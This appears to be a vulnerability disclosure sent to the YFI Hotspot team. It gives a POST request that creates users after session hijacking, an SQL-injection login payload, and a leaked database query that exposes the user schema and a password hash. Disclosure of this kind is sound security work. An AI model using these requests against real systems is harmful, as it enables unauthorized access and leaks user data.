Hello YFI Team ,
My Name Is Mohamed Khaled Fathy [ Web Application Security Researcher ] From Egypt
I've Found Vulnerability On YFI Hotspot , Maybe This Bug Is Critical Bug .
URL : http://10.1.0.1/c2/yfi_cake/permanent_users/json_add/AP/?
POST Data :
username=123pp&password=matrix&name=&surname=&address=&phone=&email=&active=on&language=4a80e849-5300-46b5-9b64-4ba1a509ff00&realm=4ee90242-50bc-4905-bb49-03c80a010001&profile=54117885-4604-40c6-aeb7-05d90a010001&cap=hard
When I Make Session Hjacking I Can Create New User In This Network
Also I found an error in the database , It is leaking the contents of a database system
Go To [ http://10.1.0.1/c2/yfi_cake/permanent_users/json_add/AP/? ]
URL : http://10.1.0.1/c2/yfi_cake/users/login
POST Data :
_method=POST&data%5BUser%5D%5Busername%5D=%27or%27%3D1%27&data%5BUser%5D%5Bpassword%5D=%27or%27%3D1%27
You Can See
2 SELECT User
.id
, User
.username
, User
.password
, User
.name
, User
.surname
, User
.address
, User
.phone
, User
.email
, User
.active
, User
.cap
, User
.data
, User
.time
, User
.group_id
, User
.radcheck_id
, User
.profile_id
, User
.user_id
, User
.realm_id
, User
.language_id
, User
.created
, User
.modified
, Group
.id
, Group
.name
, Group
.created
, Group
.modified
, Profile
.id
, Profile
.name
, Profile
.template_id
, Profile
.created
, Profile
.modified
, Creator
.id
, Creator
.username
, Creator
.password
, Creator
.name
, Creator
.surname
, Creator
.address
, Creator
.phone
, Creator
.email
, Creator
.active
, Creator
.cap
, Creator
.data
, Creator
.time
, Creator
.group_id
, Creator
.radcheck_id
, Creator
.profile_id
, Creator
.user_id
, Creator
.realm_id
, Creator
.language_id
, Creator
.created
, Creator
.modified
, Radcheck
.id
, Radcheck
.username
, Radcheck
.attribute
, Radcheck
.op
, Radcheck
.value
, Realm
.id
, Realm
.name
, Realm
.append_string_to_user
, Realm
.icon_file_name
, Realm
.phone
, Realm
.fax
, Realm
.cell
, Realm
.email
, Realm
.url
, Realm
.address
, Realm
.created
, Realm
.modified
, Language
.id
, Language
.name
, Language
.iso_name
, Language
.created
, Language
.modified
FROM users
AS User
LEFT JOIN groups
AS Group
ON (User
.group_id
= Group
.id
) LEFT JOIN profiles
AS Profile
ON (User
.profile_id
= Profile
.id
) LEFT JOIN users
AS Creator
ON (User
.user_id
= Creator
.id
) LEFT JOIN radcheck
AS Radcheck
ON (User
.radcheck_id
= Radcheck
.id
AND Attribute = 'Cleartext-Password') LEFT JOIN realms
AS Realm
ON (User
.realm_id
= Realm
.id
) LEFT JOIN languages
AS Language
ON (User
.language_id
= Language
.id
) WHERE User
.username
= '\'or\'=1\'' AND User
.password
= '6b413612c9b4cd979581aead27d728e406f3feba' LIMIT 1
Information Leakage From Database .
Anonymous